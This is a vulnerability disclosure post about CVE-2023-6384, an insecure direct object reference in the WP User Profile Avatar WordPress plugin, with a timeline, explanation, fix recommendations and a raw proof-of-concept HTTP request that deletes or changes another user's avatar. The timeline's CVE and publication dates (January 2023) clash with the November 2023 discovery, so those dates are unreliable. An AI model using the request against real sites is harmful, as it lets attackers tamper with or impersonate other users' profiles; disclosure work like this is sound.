During a comprehensive assessment of the WP User Profile Avatar plugin, a significant vulnerability was identified, namely Insecure Direct Object Reference (IDOR). This flaw allows unauthorized users to delete or alter someone else’s avatar without the necessary privileges.
Main info:
| CVE | CVE-2023-6384 |
| Plugin | WP User Profile Avatar < 1.0.1 |
| Critical | Medium |
| All Time | 50 162 |
| Active installations | 10 000+ |
| Publicly Published | January 4, 2023 |
| Last Updated | January 4, 2023 |
| Researcher | Dmtirii Ignatyev |
| OWASP TOP-10 | A5: Broken Access Control |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6384 https://wpscan.com/vulnerability/fbdefab4-614b-493b-a9ae-c5aeff8323ef/ |
| Plugin Security Certification by CleanTalk |  |
Timeline
| November 6, 2023 | Plugin testing and vulnerability detection in the WP User Profile Avatar have been completed |
| November 6, 2023 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| December 25, 2023 | The author fixed the vulnerability and released the plugin update |
| January 3, 2023 | Registered CVE-2023-6384 |
Discovery of the Vulnerability
In the process of testing the plugin, a vulnerability was found that allows you to delete/change someone else’s avatar without privilege
Understanding of IDOR attack’s
In WordPress, IDOR occurs when an application provides direct access to objects based on user-supplied input, such as URLs or form parameters. In this context, it means that the plugin does not properly check whether the user making the request has the authority to perform actions on someone else’s avatar. Real-world examples include an attacker manipulating the avatar ID in the request URL to access and modify avatars belonging to other users.
Exploiting the IDOR Vulnerability
To exploit this IDOR vulnerability, an attacker can manipulate the avatar ID in the request, enabling them to target and modify avatars associated with other users. This manipulation could involve changing avatars to inappropriate content, causing reputational harm, or deleting avatars to disrupt the user experience.
POC request:
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Host: your_site User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------49182745140183315063494246849 Content-Length: 472 Origin: http://your_site DNT: 1 Connection: close Referer: http://your_site/wordpress/?p=873 Cookie: wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=1%7C1699414980%7CyeHq6S6Ycak8JS53S82IfXyC91VGKkxL57fd6Vv4sFA%7C882ae66f7e5369755c66cd9a37b12ea93849faebf221f391f6dca1b56fd21b4d; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=1%7C1699414980%7CyeHq6S6Ycak8JS53S82IfXyC91VGKkxL57fd6Vv4sFA%7Ce163e2d4c1042710f9b0e475c500335e17ced7d7e00dfe867bf8af68d95e1e6b; wp-settings-2=libraryContent%3Dbrowse%26hidetb%3D0%26editor%3Dtinymce; wp-settings-time-2=1699242180 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------49182745140183315063494246849 Content-Disposition: form-data; name="action" remove_user_avatar # here you can add update_user_avatar and change avatar of user by id from AUTHOR account -----------------------------49182745140183315063494246849 Content-Disposition: form-data; name="form_data" wpupa_url=&wpupa_attachment_id=875&user_id=1 -----------------------------49182745140183315063494246849 Content-Disposition: form-data; name="security" 3f855e1991 -----------------------------49182745140183315063494246849--___
The potential risk associated with this IDOR vulnerability is significant. In real-world scenarios, attackers could leverage this vulnerability to perform malicious actions, including but not limited to:
- Changing avatars to offensive or harmful content.
- Deleting avatars to disrupt user experience.
- Tampering with avatars to impersonate other users.
Recommendations for Improved Security
- Access Controls: Implement robust access controls to ensure that users can only modify or delete their avatars and not those of other users.
- Input Validation: Validate and sanitize user inputs to prevent manipulation of parameters like avatar IDs.
- Logging and Monitoring: Implement logging mechanisms to track changes to avatars and regularly monitor these logs for any suspicious activities.
- Regular Audits: Conduct regular security audits to identify and address vulnerabilities within WordPress plugins.
- Educate Users: Educate users about the importance of securing their accounts and the potential risks associated with unauthorized access to avatars.
By adhering to these recommendations, WordPress administrators can significantly reduce the risk of IDOR-related attacks, protecting user avatars and maintaining a more secure environment for their website.
#WordPressSecurity #IDOR #WebsiteSafety #StayProtected #MediumVulnerability
Use CleanTalk solutions to improve the security of your website
DMITRII I.
